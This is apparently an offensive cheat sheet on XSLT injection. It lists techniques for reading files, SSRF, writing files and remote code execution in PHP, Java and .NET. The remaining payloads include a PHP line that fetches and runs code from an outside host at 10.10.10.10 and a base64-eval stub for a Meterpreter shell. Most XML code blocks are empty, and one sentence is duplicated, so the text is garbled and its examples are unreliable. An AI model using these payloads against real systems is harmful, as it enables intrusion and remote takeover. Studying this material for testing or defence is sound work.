# XSLT Injection
> Processing an un-validated XSL stylesheet can allow an attacker to change the structure and contents of the resultant XML, include arbitrary files from the file system, or execute arbitrary code
## Summary
- [Tools](#tools)
- [Methodology](#methodology)
- [Determine the Vendor And Version](#determine-the-vendor-and-version)
- [External Entity](#external-entity)
- [Read Files and SSRF Using Document](#read-files-and-ssrf-using-document)
- [Write Files with EXSLT Extension](#write-files-with-exslt-extension)
- [Remote Code Execution with PHP Wrapper](#remote-code-execution-with-php-wrapper)
- [Remote Code Execution with Java](#remote-code-execution-with-java)
- [Remote Code Execution with Native .NET](#remote-code-execution-with-native-net)
- [Labs](#labs)
- [References](#references)
## Tools
No known tools currently exist to assist with XSLT exploitation.
## Methodology
### Determine the Vendor and Version
```xml
```
```xml
Version:
Vendor:
Vendor URL:
```
### External Entity
Don't forget to test for XXE when you encounter XSLT files.
```xml
]>
Fruits &ext_file;:
- :
```
### Read Files and SSRF Using Document
```xml
Fruits:
- :
```
### Write Files with EXSLT Extension
EXSLT, or Extensible Stylesheet Language Transformations, is a set of extensions to the XSLT (Extensible Stylesheet Language Transformations) language. EXSLT, or Extensible Stylesheet Language Transformations, is a set of extensions to the XSLT (Extensible Stylesheet Language Transformations) language.
```xml
Hello World!
```
### Remote Code Execution with PHP Wrapper
Execute the function `readfile`.
```xml
```
Execute the function `scandir`.
```xml
```
Execute a remote php file using `assert`
```xml
include("http://10.10.10.10/test.php")
```
Execute a PHP meterpreter using PHP wrapper.
```xml
eval(base64_decode('Base64-encoded Meterpreter code'))
```
Execute a remote php file using `file_put_contents`
```xml
```
### Remote Code Execution with Java
```xml
```
```xml
.
```
### Remote Code Execution with Native .NET
```xml
```
```xml
--- BEGIN COMMAND OUTPUT ---
--- END COMMAND OUTPUT ---
```
## Labs
- [Root Me - XSLT - Code execution](https://www.root-me.org/en/Challenges/Web-Server/XSLT-Code-execution)
## References
- [From XSLT code execution to Meterpreter shells - Nicolas Grégoire (@agarri) - July 2, 2012](https://www.agarri.fr/blog/archives/2012/07/02/from_xslt_code_execution_to_meterpreter_shells/index.html)
- [XSLT Injection - Fortify - January 16, 2021](http://web.archive.org/web/20210116001237/https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt_injection)
- [XSLT Injection Basics - Saxon - Hunnic Cyber Team - August 21, 2019](http://web.archive.org/web/20190821174700/https://blog.hunniccyber.com/ektron-cms-remote-code-execution-xslt-transform-injection-java/)
- [Getting XXE in Web Browsers using ChatGPT - Igor Sak-Sakovskiy - May 22, 2024](https://swarm.ptsecurity.com/xxe-chrome-safari-chatgpt/)
- [XSLT injection lead to file creation - PT SWARM (@ptswarm) - May 30, 2024](https://twitter.com/ptswarm/status/1796162911108255974/photo/1)